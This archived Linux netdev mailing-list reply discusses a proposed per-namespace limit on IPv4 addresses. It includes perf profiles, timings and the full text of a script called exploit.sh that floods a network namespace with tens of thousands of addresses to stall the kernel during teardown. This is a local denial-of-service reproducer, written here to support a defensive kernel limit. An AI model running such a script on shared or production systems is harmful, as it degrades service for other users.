netdev.vger.kernel.org archive mirror
From: Cyrill Gorcunov <gorcunov@gmail.com>
To: Eric Dumazet <eric.dumazet@gmail.com>,
	David Miller <davem@davemloft.net>
Cc: netdev@vger.kernel.org, solar@openwall.com, vvs@virtuozzo.com,
	avagin@virtuozzo.com, xemul@virtuozzo.com,
	vdavydov@virtuozzo.com, khorenko@virtuozzo.com
Subject: Re: [RFC] net: ipv4 -- Introduce ifa limit per net
Date: Wed, 9 Mar 2016 19:39:19 +0300
Message-ID: <20160309163919.GJ2207@uranus.lan>
In-Reply-To: <20160306170641.GA8820@uranus.lan>

On Sun, Mar 06, 2016 at 08:06:41PM +0300, Cyrill Gorcunov wrote:
> > 
> > Well, this looks like LOCKDEP kernel. Are you really running LOCKDEP on
> > production kernels ?
> 

Hi Eric, David. Sorry for the delay. I've finally measured the
latency on real hardware: an i7-2600 CPU with 16G of memory. Here
is the collected data.

---
Unpatched vanilla
=================

commit 7f02bf6b5f5de90b7a331759b5364e41c0f39bf9
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Tue Mar 8 09:41:20 2016 -0800

 Creating new addresses
 ----------------------
  19.26%  [kernel]                      [k] check_lifetime
  13.88%  [kernel]                      [k] __inet_insert_ifa
  13.01%  [kernel]                      [k] inet_rtm_newaddr

 Release
 -------
  20.96%  [kernel]                    [k] _raw_spin_lock
  17.79%  [kernel]                    [k] preempt_count_add
  14.79%  [kernel]                    [k] __local_bh_enable_ip
  13.08%  [kernel]                    [k] preempt_count_sub
   9.21%  [kernel]                    [k] nf_ct_iterate_cleanup
   3.15%  [kernel]                    [k] _raw_spin_unlock
   2.80%  [kernel]                    [k] nf_conntrack_lock
   2.67%  [kernel]                    [k] in_lock_functions
   2.63%  [kernel]                    [k] get_parent_ip
   2.26%  [kernel]                    [k] __inet_del_ifa
   2.17%  [kernel]                    [k] fib_del_ifaddr
   1.77%  [kernel]                    [k] _cond_resched

[root@s125 ~]# ./exploit.sh
START 4		addresses STOP 1457537580 1457537581
START 2704	addresses STOP 1457537584 1457537589
START 10404	addresses STOP 1457537602 1457537622
START 23104	addresses STOP 1457537657 1457537702
START 40804	addresses STOP 1457537784 1457537867
START 63504	addresses STOP 1457538048 1457538187

Patched (David's two patches)
=============================

 Creating new addresses
 ----------------------
  21.63%  [kernel]                    [k] check_lifetime
  14.31%  [kernel]                    [k] __inet_insert_ifa
  13.47%  [kernel]                    [k] inet_rtm_newaddr
   1.53%  [kernel]                    [k] check_preemption_disabled
   1.38%  [kernel]                    [k] page_fault
   1.27%  [kernel]                    [k] unmap_page_range

 Release
 -------
  24.26%  [kernel]                    [k] _raw_spin_lock
  17.55%  [kernel]                    [k] preempt_count_add
  14.81%  [kernel]                    [k] __local_bh_enable_ip
  14.17%  [kernel]                    [k] preempt_count_sub
  10.10%  [kernel]                    [k] nf_ct_iterate_cleanup
   3.00%  [kernel]                    [k] _raw_spin_unlock
   2.95%  [kernel]                    [k] nf_conntrack_lock
   2.86%  [kernel]                    [k] in_lock_functions
   2.73%  [kernel]                    [k] get_parent_ip
   1.91%  [kernel]                    [k] _cond_resched
   0.39%  [kernel]                    [k] task_tick_fair
   0.27%  [kernel]                    [k] native_write_msr_safe
   0.22%  [kernel]                    [k] rcu_check_callbacks
   0.20%  [kernel]                    [k] check_lifetime
   0.18%  [kernel]                    [k] check_preemption_disabled
   0.16%  [kernel]                    [k] hrtimer_active
   0.13%  [kernel]                    [k] __inet_insert_ifa
   0.13%  [kernel]                    [k] __memmove
   0.13%  [kernel]                    [k] inet_rtm_newaddr

[root@s125 ~]# ./exploit.sh
START 4		addresses STOP 1457539863 1457539864
START 2704	addresses STOP 1457539867 1457539872
START 10404	addresses STOP 1457539885 1457539905
START 23104	addresses STOP 1457539938 1457539980
START 40804	addresses STOP 1457540058 1457540132
START 63504	addresses STOP 1457540305 1457540418
---
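
For reference, the gap between the two timestamps printed after STOP is the time spent in the one-second sleep plus the "ip r" loop while the namespace is being torn down. A minimal sketch to compute it from the output above; stop_delta is a made-up helper name, not part of the original script:

```shell
#!/bin/sh
# stop_delta: read exploit.sh output lines on stdin and print
# "<addresses> <seconds>", where seconds = last field - previous field.
# Hypothetical helper for illustration only.
stop_delta() {
	awk '$1 == "START" && NF >= 6 { print $2, $NF - $(NF-1) }'
}

echo "unpatched:"
stop_delta <<'EOF'
START 4 addresses STOP 1457537580 1457537581
START 2704 addresses STOP 1457537584 1457537589
START 10404 addresses STOP 1457537602 1457537622
START 23104 addresses STOP 1457537657 1457537702
START 40804 addresses STOP 1457537784 1457537867
START 63504 addresses STOP 1457538048 1457538187
EOF
# seconds column: 1 5 20 45 83 139

echo "patched:"
stop_delta <<'EOF'
START 4 addresses STOP 1457539863 1457539864
START 2704 addresses STOP 1457539867 1457539872
START 10404 addresses STOP 1457539885 1457539905
START 23104 addresses STOP 1457539938 1457539980
START 40804 addresses STOP 1457540058 1457540132
START 63504 addresses STOP 1457540305 1457540418
EOF
# seconds column: 1 5 20 42 74 113
```

At 63504 addresses that is 139 seconds unpatched against 113 seconds patched, with date(1) giving only one-second resolution.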

Lockdep is turned off. The script itself is:
---
[root@s125 ~]# cat ./exploit.sh 
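#!/bin/sh

if [ -z "$1" ]; then
	# Parent: for each step, fill a fresh net namespace with addresses.
	for x in $(seq 1 50 255); do
		printf 'START '
		# The child prints the address count and the first timestamp;
		# the namespace goes away when the child exits.
		(unshare -n /bin/sh exploit.sh "$x")
		sleep 1
		# Run "ip r" 101 times while the kernel cleans up.
		for j in $(seq 0 100); do
			ip r > /dev/null
		done
		# Second timestamp, taken after the loop finishes.
		printf ' '
		date +%s
	done
else
	# Child: add ($1 + 1)^2 addresses to lo in the new namespace.
	for x in $(seq 0 "$1"); do
		for y in $(seq 0 "$1"); do
			ip a a "127.1.$x.$y" dev lo
		done
	done
	num=$(ip a l dev lo | grep -c "inet ")
	printf '%s addresses STOP %s' "$num" "$(date +%s)"
	exit
fi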
---
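
Each pass of the outer loop creates (x + 1)^2 addresses, since both inner loops run from 0 to x inclusive. A quick sketch to check the counts per step against the output; addr_count is an illustrative name only:

```shell
#!/bin/sh
# addr_count X: number of addresses the two nested "seq 0 X" loops create.
addr_count() {
	echo $(( ($1 + 1) * ($1 + 1) ))
}

# Same step sequence as the outer loop of the script.
for x in $(seq 1 50 255); do
	echo "x=$x -> $(addr_count "$x") addresses"
done
# counts: 4, 2704, 10404, 23104, 40804, 63504
```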

Note that I run "ip r" in a loop and added a sleep before it. On an
idle machine this loop takes ~1 second, but when it runs while the
kernel is cleaning up the net namespace it takes much longer.
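
The loop duration could also be measured directly instead of by subtracting timestamps by hand. A rough sketch, assuming a POSIX shell and the one-second resolution of date(1); time_loop is a hypothetical helper, not something from the script:

```shell
#!/bin/sh
# time_loop N CMD...: run CMD N times with output discarded and
# print the elapsed wall-clock time in whole seconds.
time_loop() {
	n=$1
	shift
	start=$(date +%s)
	i=0
	while [ "$i" -lt "$n" ]; do
		"$@" > /dev/null 2>&1
		i=$((i + 1))
	done
	end=$(date +%s)
	echo $((end - start))
}

# Usage, right after the shell that owned the namespace has exited:
#   time_loop 101 ip r
```

Unlike the script, this excludes the one-second sleep from the reported number.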

Also, here is a graph of the collected data (blue line: unpatched
version, red: patched). With the patched version it is of course
much better, but it still hangs.

https://docs.google.com/spreadsheets/d/1eyQDxjuZY2DHKYksGACpHDDcV1Bd92e-ZiY8ywPKshA/edit?usp=sharing

The perf output earlier shows "perf top" while the addresses
are being created and while they are being released.

I think the main problem is still that we allow requesting
as many inet addresses as free memory permits. The kernel of
course can't handle them all in O(1) time: all the resources
must be released, so there will always be some lag. So maybe
introducing limits would be a good idea for sysadmins.
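
To illustrate what such a cap would mean in practice, here is a userspace sketch only. It is not the RFC patch and enforces nothing in the kernel; over_limit and the limit value are made up for illustration:

```shell
#!/bin/sh
# over_limit LIMIT: read "ip -o -4 addr show" style lines on stdin
# (one address per line) and succeed if their count exceeds LIMIT.
# LIMIT is an arbitrary admin-chosen number, not an existing kernel knob.
over_limit() {
	count=$(grep -c 'inet ')
	[ "$count" -gt "$1" ]
}

# Usage inside a namespace:
#   ip -o -4 addr show | over_limit 4096 && echo "too many addresses"
```

A check like this can only report after the fact; refusing the request at address-creation time would have to happen in the kernel.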

	Cyrill
